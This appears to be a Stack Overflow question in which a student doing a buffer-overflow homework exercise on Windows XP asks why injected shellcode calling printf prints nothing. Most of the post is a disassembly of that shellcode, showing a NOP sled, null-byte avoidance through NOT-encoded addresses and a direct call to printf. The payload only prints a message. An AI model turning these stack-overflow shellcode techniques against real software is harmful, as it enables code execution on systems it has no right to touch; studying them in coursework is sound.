Printf in assembler doesn't print

Posted by Gaim on Stack Overflow See other posts from Stack Overflow or by Gaim
Published on 2010-04-27T06:45:14Z Indexed on 2010/04/27 7:53 UTC
Read the original article Hit count: 353

Hi there, I have got a homework to hack program using buffer overflow ( with disassambling, program was written in C++, I haven't got the source code ). I have already managed it but I have a problem. I have to print some message on the screen, so I found out address of printf function, pushed address of "HACKED" and address of "%s" on the stack ( in this order ) and called that function. Called code passed well but nothing had been printed.

I have tried to simulate the environment like in other place in the program but there has to be something wrong. Do you have any idea what I am doing wrong that I have no output, please? Thanks a lot

EDIT:

This program is running on Windows XP SP3 32b, written in C++, Intel asm

there is the "hack" code

CPU Disasm
Address   Hex dump          Command                                  Comments
0012F9A3    90              NOP                                      ;hack begins
0012F9A4    90              NOP
0012F9A5    90              NOP
0012F9A6    89E5            MOV EBP,ESP
0012F9A8    83EC 7F         SUB ESP,7F                               ;creating a place for working data
0012F9AB    83EC 7F         SUB ESP,7F
0012F9AE    31C0            XOR EAX,EAX
0012F9B0    50              PUSH EAX
0012F9B1    50              PUSH EAX
0012F9B2    50              PUSH EAX
0012F9B3    89E8            MOV EAX,EBP
0012F9B5    83E8 09         SUB EAX,9
0012F9B8    BA 1406EDFF     MOV EDX,FFED0614                            ;address to jump, it is negative because there mustn't be 00 bytes
0012F9BD    F7DA            NOT EDX
0012F9BF    FFE2            JMP EDX                                     ;I have to jump because there are some values overwritten by the program
0012F9C1    90              NOP
0012F9C2    0090 00000000   ADD BYTE PTR DS:[EAX],DL
0012F9C8    90              NOP
0012F9C9    90              NOP
0012F9CA    90              NOP
0012F9CB    90              NOP
0012F9CC    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command
0012F9CD    65:6E           OUTS DX,BYTE PTR GS:[ESI]                ; I/O command
0012F9CF    67:74 68        JE SHORT 0012FA3A                        ; Superfluous address size prefix
0012F9D2    2069 73         AND BYTE PTR DS:[ECX+73],CH
0012F9D5    203439          AND BYTE PTR DS:[EDI+ECX],DH
0012F9D8    34 2C           XOR AL,2C
0012F9DA    2066 69         AND BYTE PTR DS:[ESI+69],AH
0012F9DD    72 73           JB SHORT 0012FA52
0012F9DF    74 20           JE SHORT 0012FA01
0012F9E1    3120            XOR DWORD PTR DS:[EAX],ESP
0012F9E3    6C              INS BYTE PTR ES:[EDI],DX                 ; I/O command
0012F9E4    696E 65 7300909 IMUL EBP,DWORD PTR DS:[ESI+65],-6F6FFF8D
0012F9EB    90              NOP
0012F9EC    90              NOP
0012F9ED    90              NOP
0012F9EE    31DB            XOR EBX,EBX                             ; hack continues
0012F9F0    8818            MOV BYTE PTR DS:[EAX],BL               ; writing 00 behind word "HACKED"
0012F9F2    83E8 06         SUB EAX,6
0012F9F5    50              PUSH EAX  ; address of "HACKED"
0012F9F6    B8 3B8CBEFF     MOV EAX,FFBE8C3B
0012F9FB    F7D0            NOT EAX
0012F9FD    50              PUSH EAX   ; address of "%s"
0012F9FE    B8 FFE4BFFF     MOV EAX,FFBFE4FF
0012FA03    F7D0            NOT EAX
0012FA05    FFD0            CALL EAX    ;address of printf                             

This code is really ugly because I am new in assembler and there mustn't be null bytes because of buffer-overflow bug

© Stack Overflow or respective owner

Related posts about assembler

Related posts about disassembling